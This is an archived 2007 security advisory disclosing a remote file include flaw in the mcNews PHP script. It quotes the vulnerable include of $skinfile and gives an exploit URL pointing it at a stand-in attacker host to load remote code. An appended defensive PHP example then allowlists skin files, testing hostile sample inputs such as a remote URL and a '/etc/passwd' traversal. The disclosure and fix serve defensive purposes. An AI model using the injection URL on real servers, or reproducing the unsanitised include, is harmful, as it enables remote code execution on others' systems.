
mcNews (skinfile) Remote File Include Vulnerability

From: <ilkerkandemir(at)mynet.com>
Date: Sat Aug 11 2007 - 11:09:54 EDT



MEFISTO PreSents...

Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
/* MEFISTO */



Code:
if($voir!='') {
  $skinfile=strstr($skinfile, 'skin');
include ("$skinfile");

Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?


Tnx:dumenci,h0tturk,ajann

# MefistoLabs.Com

Received on Mon Aug 13 12:02:35 2007

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:11:32 EDT
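
A defensive counterpart to the include shown in the advisory, added here as an example; it is not part of the original post and is not mcNews code. It maps the request-supplied skinfile value onto a fixed allowlist so that no caller-controlled path or URL reaches include. The function name resolve_skin, the skin names and file names, and the sample request values are all assumptions constructed for the example.

```php
<?php
// Added example, not mcNews code. Skin names and file names are assumptions.
const SKINS = [
    'default' => 'skin_default.php',
    'dark'    => 'skin_dark.php',
];

/**
 * Map a request-supplied skin name to a file inside $skinDir.
 * Anything not in the allowlist (URLs, traversal, arrays) gets the default.
 */
function resolve_skin(string $skinDir, $requested): string
{
    $key = (is_string($requested) && array_key_exists($requested, SKINS))
        ? $requested : 'default';

    $base = realpath($skinDir);
    $path = realpath($skinDir . DIRECTORY_SEPARATOR . SKINS[$key]);

    // Defence in depth: the file must exist and resolve inside the skin directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('skin file missing or outside skin directory');
    }
    return $path;
}

// Constructed demo: a throwaway skin directory and sample request values.
// In an application the call would be resolve_skin(<skin dir>, $_GET['skinfile'] ?? null).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'skins_demo_' . getmypid();
mkdir($dir);
foreach (SKINS as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "<?php // constructed skin\n");
}

$samples = ['dark', 'http://example.invalid/skin.txt?', '../../etc/passwd', ['x'], null];
foreach ($samples as $value) {
    $resolved = resolve_skin($dir, $value);
    printf("%-40s -> %s\n", json_encode($value), basename($resolved));
    include $resolved;   // only ever an allowlisted local file
}

// Clean up the constructed files.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Independently of this check, keeping allow_url_include set to Off in php.ini (the default since PHP 5.2) stops include from fetching remote URLs at all.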

